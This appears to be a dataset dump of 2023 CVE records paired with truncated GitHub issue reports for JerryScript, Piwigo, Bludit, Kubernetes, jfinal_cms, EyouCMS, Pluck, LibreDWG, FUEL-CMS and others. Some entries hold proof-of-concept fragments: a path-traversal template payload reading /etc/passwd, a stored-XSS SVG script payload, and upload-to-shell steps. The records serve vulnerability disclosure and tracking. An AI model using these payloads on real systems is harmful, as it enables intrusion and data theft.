python ./tools/build.py --clean --debug --compile-flag=-m32... | Assertion 'ECMA_PROPERTY_IS_PROPERTY_PAIR (prop_iter_p)' failed at ./jerryscript/jerry-core/ecma/base/ecma-property-hashmap.c(ecma_property_hashmap_create) | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5084/comments | 0 | 2023-06-05T11:59:55Z | 2023-06-05T11:59:55Z | https://github.com/jerryscript-project/jerryscript/issues/5084 | 1,741,623,530 | 5,084 |
CVE-2023-34868 | 2023-06-14T16:15:20.323 | Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the parser_parse_for_statement_start at jerry-core/parser/js/js-parser-statm.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5083"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSta... | https://github.com/jerryscript-project/jerryscript/issues/5083 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"jerryscript-project",
"jerryscript"
] | ###### JerryScript revision
Commit: https://github.com/jerryscript-project/jerryscript/commit/05dbbd134c3b9e2482998f267857dd3722001cd7
Version: v3.0.0
###### Build platform
Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)
###### Build steps
```sh
python ./tools/build.py --clean --debug --compile-flag=-m32... | Assertion 'context_p->token.type != LEXER_RIGHT_PAREN' failed at ./jerryscript/jerry-core/parser/js/js-parser-statm.c(parser_parse_for_statement_start) | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5083/comments | 0 | 2023-05-31T12:11:34Z | 2023-05-31T12:11:34Z | https://github.com/jerryscript-project/jerryscript/issues/5083 | 1,734,082,739 | 5,083 |
CVE-2023-34626 | 2023-06-15T16:15:09.347 | Piwigo 13.7.0 is vulnerable to SQL Injection via the "Users" function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/Piwigo/Piwigo/issues/1924"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4B9AEE3-C9C5-4D20-BA38-9E5A2A64FABD",
"versionEndExcluding": null,
"versionEndIncluding": "13.7.0",
"versionStartExcludin... | https://github.com/Piwigo/Piwigo/issues/1924 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"Piwigo",
"Piwigo"
] | Access the 'Users' function and use the filter function

Observe the request on Burp Suite

Manipulate the 'order' or 'e... | SQL Injection in the "Users" function of piwigo | https://api.github.com/repos/Piwigo/Piwigo/issues/1924/comments | 0 | 2023-05-25T07:54:09Z | 2023-05-29T10:27:38Z | https://github.com/Piwigo/Piwigo/issues/1924 | 1,725,285,095 | 1,924 |
CVE-2023-34845 | 2023-06-16T04:15:14.143 | Bludit v3.14.1 was discovered to contain an arbitrary file upload vulnerability in the component /admin/new-content. This vulnerability allows attackers to execute arbitrary web scripts or HTML via uploading a crafted SVG file. NOTE: the product's security model is that users are trusted by the administrator to insert ... | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/bludit/bludit/issues/1212#issuecomment-649514491"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://github.com/bludit/bludit/issues/1369#issuecomment-940806199"
},
{
"source": "cve@mitre.org",
"... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bludit:bludit:3.14.1:*:*:*:*:*:*:*",
"matchCriteriaId": "E1884F54-CD39-43CC-B52B-8B2335A09CDB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | https://github.com/bludit/bludit/issues/1508 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"bludit",
"bludit"
] | ### Describe your problem
I found a cross-site scripting attack on the new content creating page http://localhost:800/admin/new-content
it will execute the script in user context allowing the attacker to access any cookies or sessions tokens retained
by the browser.
Stored XSS, also known as persistent XSS, is the ... | version 3.14.1 is vulnerable to stored xss or ssrf via file upload. | https://api.github.com/repos/bludit/bludit/issues/1508/comments | 1 | 2023-04-14T06:49:20Z | 2024-03-03T08:29:18Z | https://github.com/bludit/bludit/issues/1508 | 1,667,617,923 | 1,508 |
CVE-2023-2431 | 2023-06-16T08:15:08.770 | A security issue was discovered in Kubelet that allows pods to bypass the seccomp profile enforcement. Pods that use localhost type for seccomp profile but specify an empty profile field, are affected by this issue. In this scenario, this vulnerability allows the pod to run in unconfined (seccomp disabled) mode. This b... | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "jordan@liggitt.net",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/kubernetes/kubernetes/issues/118690"
},
{
"source": "jordan@liggitt.net",
"tags": [
"Mailing List"
],
"url": "https://groups.google.com/g/kubernetes-security-announce/c/QHmx0HOQ... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*",
"matchCriteriaId": "59A9CBF2-B94B-4311-AE41-6CEA2DA7E24B",
"versionEndExcluding": "1.24.14",
"versionEndIncluding": null,
"versionStar... | https://github.com/kubernetes/kubernetes/issues/118690 | [
"Issue Tracking"
] | github.com | [
"kubernetes",
"kubernetes"
] | ### What happened?
A security issue was discovered in Kubelet that allows pods to bypass the seccomp profile enforcement. This issue has been rated LOW ([CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N)) (score: 3.4).
If you have... | CVE-2023-2431: Bypass of seccomp profile enforcement | https://api.github.com/repos/kubernetes/kubernetes/issues/118690/comments | 6 | 2023-06-15T14:42:32Z | 2023-09-29T21:16:18Z | https://github.com/kubernetes/kubernetes/issues/118690 | 1,758,988,605 | 118,690 |
CVE-2023-34645 | 2023-06-16T18:15:09.367 | jfinal CMS 5.1.0 has an arbitrary file read vulnerability. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/jflyfox/jfinal_cms/issues/57"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | https://github.com/jflyfox/jfinal_cms/issues/57 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"jflyfox",
"jfinal_cms"
] | Project address:
https://github.com/jflyfox/jfinal_cms
official website:
http://mtg.jflyfox.com/
Enter the background, edit /template/includes/jquery.html in the template management , poc is as follows
${printFile('../../../../../../../../../../../../../../../etc/passwd')}

##### 前端版本:vue3版?还是 vue2版?
vue3版
##### 问题描述:
经测试发现/jeecg-boot/jmreport/upload接口存在未授权任意文件上传,可以上传html文件造成存储型的XSS。
##### 截图&代码:
下载使用https://github.com/jeecgboot/jeecg-boot项目源代码启动项目后,
入口:“报表设计器”-->"新建报表"-->"插入图片"
抓取包,获得上传接口,下面证明任意文件上传的存在。
 vulnerability in Eyoucms v1.6.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the web_recordnum parameter. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/43"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.2:*:*:*:*:*:*:*",
"matchCriteriaId": "5B87F220-D05C-4885-8C0E-E5BD8D8DFB66",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | https://github.com/weng-xianhu/eyoucms/issues/43 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | There is a storage type cross site scripting vulnerability in the filing number of the Basic Information tab on the backend management page of EyouCMS v1.6.2

 parameter. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/pluck-cms/pluck/issues/79"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pluck-cms:pluckcms:4.7.10:dev:*:*:*:*:*:*",
"matchCriteriaId": "F81490FE-D8E4-42ED-9D60-7D44697E52AB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStart... | https://github.com/pluck-cms/pluck/issues/79 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"pluck-cms",
"pluck"
] | admin.php:

language.php:

save_file():

Saves... | Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability when creating a new web page | https://api.github.com/repos/pluck-cms/pluck/issues/80/comments | 2 | 2019-10-21T07:55:24Z | 2019-11-01T18:58:26Z | https://github.com/pluck-cms/pluck/issues/80 | 509,793,657 | 80 |
CVE-2020-20919 | 2023-06-20T15:15:10.857 | File upload vulnerability in Pluck CMS v.4.7.10-dev2 allows a remote attacker to execute arbitrary code and access sensitive information via the theme.php file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/pluck-cms/pluck/issues/85"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.10:dev2:*:*:*:*:*:*",
"matchCriteriaId": "960CA1A9-1510-488A-82C2-14AFA3AF7FBE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | https://github.com/pluck-cms/pluck/issues/85 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"pluck-cms",
"pluck"
] | pluck-cms<=4.7.10-dev4 admin background exists a remote command execution vulnerability when install a theme
Demo:
After the installation is successful, go to the management background.

optio... | pluck-cms<=4.7.10-dev4 admin background exists a remote command execution vulnerability when install a theme | https://api.github.com/repos/pluck-cms/pluck/issues/85/comments | 2 | 2019-10-22T03:15:36Z | 2019-10-22T07:17:36Z | https://github.com/pluck-cms/pluck/issues/85 | 510,405,792 | 85 |
CVE-2020-20969 | 2023-06-20T15:15:10.900 | File Upload vulnerability in PluckCMS v.4.7.10 allows a remote attacker to execute arbitrary code via the trashcan_restoreitem.php file. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/pluck-cms/pluck/issues/86"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.10:-:*:*:*:*:*:*",
"matchCriteriaId": "00EE308A-BD13-4E84-BB56-D890CB35E07A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclu... | https://github.com/pluck-cms/pluck/issues/86 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"pluck-cms",
"pluck"
] | Pluck-4.7.10 admin background exists a remote command execution vulnerability
it happens when restore file from trashcan,and the restoring file has the same with one of the files in uploaded files dir
the coding flaw is in file /pluck/data/inc/trashcan_restoreitem.php at line 54
 vulnerability in the filing number of the Basic Information tab on the backend management page of EyouCMS v1.6.3 | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/weng-xianhu/eyoucms/issues/44"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.3:*:*:*:*:*:*:*",
"matchCriteriaId": "0DDC6EF0-7D79-4155-B984-0BA7756C05EC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | https://github.com/weng-xianhu/eyoucms/issues/44 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"weng-xianhu",
"eyoucms"
] | There is a storage type cross site scripting vulnerability in the filing number of the Basic Information tab on the backend management page of EyouCMS v1.6.3
poc:
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
 function at parser.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/273"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libming:libming:0.4.7:*:*:*:*:*:*:*",
"matchCriteriaId": "18B4A4AA-DE48-45A4-AE25-1C83C1CDC743",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclud... | https://github.com/libming/libming/issues/273 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"libming",
"libming"
] | # Allocation size overflow in parseSWF_DEFINEFONTINFO() at parser.c:1948
Allocation size overflow in the listswf at function parseSWF_DEFINEFONTINFO in parser.c:1948.
## Environment
Ubuntu 18.04, 64 bit
libming 0.4.7
## Steps to reproduce
1. download file
```
git clone https://github.com/libming/libming.g... | Allocation size overflow in parseSWF_DEFINEFONTINFO() at parser.c:1948 | https://api.github.com/repos/libming/libming/issues/273/comments | 0 | 2023-06-13T07:08:07Z | 2023-06-13T07:08:07Z | https://github.com/libming/libming/issues/273 | 1,754,192,903 | 273 |
CVE-2023-36271 | 2023-06-23T15:15:10.027 | LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_wcs2nlen at bits.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/681#BUG2"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:libredwg:0.12.5:*:*:*:*:*:*:*",
"matchCriteriaId": "8B002438-509E-462D-B17E-129197C3E4B3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | https://github.com/LibreDWG/libredwg/issues/681#BUG2 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"LibreDWG",
"libredwg"
] | Hello, I was testing my fuzzer and found two bugs in dwg2SVG.
## environment
ubuntu 20.04, GCC 9.4.0, libredwg latest commit 9df4ec3c524795a401acf371c8a953f5b1a6fadf
compile with
```
./autogen.sh && ./configure --disable-shared && make -j$(nproc)
```
##BUG1
```
./dwg2SVG ../pocs/poc0.bit_utf8_to_TU
==... | [FUZZ] two bugs in dwg2SVG | https://api.github.com/repos/LibreDWG/libredwg/issues/681/comments | 3 | 2023-03-31T04:10:48Z | 2023-03-31T13:37:12Z | https://github.com/LibreDWG/libredwg/issues/681 | 1,648,637,134 | 681 |
CVE-2023-36272 | 2023-06-23T15:15:10.103 | LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_utf8_to_TU at bits.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/681#BUG1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:libredwg:0.12.5:*:*:*:*:*:*:*",
"matchCriteriaId": "8B002438-509E-462D-B17E-129197C3E4B3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | https://github.com/LibreDWG/libredwg/issues/681#BUG1 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"LibreDWG",
"libredwg"
] | Hello, I was testing my fuzzer and found two bugs in dwg2SVG.
## environment
ubuntu 20.04, GCC 9.4.0, libredwg latest commit 9df4ec3c524795a401acf371c8a953f5b1a6fadf
compile with
```
./autogen.sh && ./configure --disable-shared && make -j$(nproc)
```
##BUG1
```
./dwg2SVG ../pocs/poc0.bit_utf8_to_TU
==... | [FUZZ] two bugs in dwg2SVG | https://api.github.com/repos/LibreDWG/libredwg/issues/681/comments | 3 | 2023-03-31T04:10:48Z | 2023-03-31T13:37:12Z | https://github.com/LibreDWG/libredwg/issues/681 | 1,648,637,134 | 681 |
CVE-2023-36273 | 2023-06-23T15:15:10.160 | LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_calc_CRC at bits.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/677#BUG1"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:libredwg:0.12.5:*:*:*:*:*:*:*",
"matchCriteriaId": "8B002438-509E-462D-B17E-129197C3E4B3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | https://github.com/LibreDWG/libredwg/issues/677#BUG1 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"LibreDWG",
"libredwg"
] |
Hello, I was testing my fuzzer and found two bugs in dwg2dxf, which is different from #368 and #484
## environment
ubuntu 20.04, GCC 9.4.0, libredwg latest commit 77a85621de6e2c7ea44bc48c02e52dac97778ecb
compile with
```
./autogen.sh && ./configure --disable-shared && make -j$(nproc)
```
## BUG1
```
/li... | [FUZZ] two bugs in dwg2dxf | https://api.github.com/repos/LibreDWG/libredwg/issues/677/comments | 2 | 2023-03-30T04:10:56Z | 2023-04-04T14:03:23Z | https://github.com/LibreDWG/libredwg/issues/677 | 1,646,878,719 | 677 |
CVE-2023-36274 | 2023-06-23T15:15:10.213 | LibreDWG v0.12.5 was discovered to contain a heap buffer overflow via the function bit_write_TF at bits.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LibreDWG/libredwg/issues/677#BUG2"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gnu:libredwg:0.12.5:*:*:*:*:*:*:*",
"matchCriteriaId": "8B002438-509E-462D-B17E-129197C3E4B3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | https://github.com/LibreDWG/libredwg/issues/677#BUG2 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"LibreDWG",
"libredwg"
] |
Hello, I was testing my fuzzer and found two bugs in dwg2dxf, which is different from #368 and #484
## environment
ubuntu 20.04, GCC 9.4.0, libredwg latest commit 77a85621de6e2c7ea44bc48c02e52dac97778ecb
compile with
```
./autogen.sh && ./configure --disable-shared && make -j$(nproc)
```
## BUG1
```
/li... | [FUZZ] two bugs in dwg2dxf | https://api.github.com/repos/LibreDWG/libredwg/issues/677/comments | 2 | 2023-03-30T04:10:56Z | 2023-04-04T14:03:23Z | https://github.com/LibreDWG/libredwg/issues/677 | 1,646,878,719 | 677 |
CVE-2020-20210 | 2023-06-26T18:15:09.407 | Bludit 3.9.2 is vulnerable to Remote Code Execution (RCE) via /admin/ajax/upload-images. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/bludit/bludit/issues/1079"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:bludit:bludit:3.9.2:*:*:*:*:*:*:*",
"matchCriteriaId": "10A81FA4-0E1B-4680-A04F-E4D2267A98E2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | https://github.com/bludit/bludit/issues/1079 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"bludit",
"bludit"
] | ### A Code Execution Vulnerability in Bludit v3.9.2
#### There is a Code Execution Vulnerability which allow to get server permissions,the url is /admin/ajax/upload-images
#### 1, login with any account which allows you to edit content
![image](https://user-images.githubusercontent.com/35037256/64001984-9b44d800... | Bludit v3.9.2 Code Execution Vulnerability in "Images Upload" | https://api.github.com/repos/bludit/bludit/issues/1079/comments | 5 | 2019-08-30T07:47:59Z | 2019-10-24T18:24:36Z | https://github.com/bludit/bludit/issues/1079 | 487,339,964 | 1,079 |
CVE-2020-22151 | 2023-07-03T21:15:09.240 | Permissions vulnerability in Fuel-CMS v.1.4.6 allows a remote attacker to execute arbitrary code via a crafted zip file to the assests parameter of the upload function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/551"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.6:*:*:*:*:*:*:*",
"matchCriteriaId": "F67321E5-38B6-455B-8BD2-B8C71878FC72",
"versionEndExcluding": null,
"versionEndIncluding": null,
"version... | https://github.com/daylightstudio/FUEL-CMS/issues/551 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"daylightstudio",
"FUEL-CMS"
] | 1. First create a php file that executes the command and compress the php file into a zip
<img width="606" alt="1" src="https://user-images.githubusercontent.com/9522862/74303980-98127100-4d96-11ea-9b59-101e6d44d889.png">
<img width="320" alt="2" src="https://user-images.githubusercontent.com/9522862/74304008-b11b22... | getshell in assets | https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/551/comments | 1 | 2020-02-12T04:56:19Z | 2020-09-30T20:49:24Z | https://github.com/daylightstudio/FUEL-CMS/issues/551 | 563,752,895 | 551 |
CVE-2020-22152 | 2023-07-03T21:15:09.293 | Cross Site Scripting vulnerability in daylight studio FUEL- CMS v.1.4.6 allows a remote attacker to execute arbitrary code via the page title, meta description and meta keywords of the pages function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integ... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/552"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.6:*:*:*:*:*:*:*",
"matchCriteriaId": "F67321E5-38B6-455B-8BD2-B8C71878FC72",
"versionEndExcluding": null,
"versionEndIncluding": null,
"version... | https://github.com/daylightstudio/FUEL-CMS/issues/552 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"daylightstudio",
"FUEL-CMS"
] | Stored xss in Page title, Meta description, Meta keywords of pages
<img width="1140" alt="xss1" src="https://user-images.githubusercontent.com/9522862/74311085-9a31fb00-4da9-11ea-84a0-b65eb76ba02b.png">
<img width="1146" alt="xss2" src="https://user-images.githubusercontent.com/9522862/74311126-aae27100-4da9-11ea-9f8... | XSS in pages | https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/552/comments | 0 | 2020-02-12T07:10:34Z | 2021-04-15T18:33:49Z | https://github.com/daylightstudio/FUEL-CMS/issues/552 | 563,798,483 | 552 |
CVE-2020-22153 | 2023-07-03T21:15:09.340 | File Upload vulnerability in FUEL-CMS v.1.4.6 allows a remote attacker to execute arbitrary code via a crafted .php file to the upload parameter in the navigation function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"in... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/daylightstudio/FUEL-CMS/issues/553"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.4.6:*:*:*:*:*:*:*",
"matchCriteriaId": "F67321E5-38B6-455B-8BD2-B8C71878FC72",
"versionEndExcluding": null,
"versionEndIncluding": null,
"version... | https://github.com/daylightstudio/FUEL-CMS/issues/553 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"daylightstudio",
"FUEL-CMS"
] |
<img width="837" alt="c1" src="https://user-images.githubusercontent.com/9522862/74326653-bc397680-4dc5-11ea-9e41-c24b32bf4bad.png">
upload function:
<img width="1006" alt="c2" src="https://user-images.githubusercontent.com/9522862/74326673-c3608480-4dc5-11ea-89d8-9246baff623c.png">
$This-> fuel-> navigation-> u... | Code execution in navigation/upload | https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/553/comments | 0 | 2020-02-12T10:44:49Z | 2020-09-30T21:04:55Z | https://github.com/daylightstudio/FUEL-CMS/issues/553 | 563,911,041 | 553 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.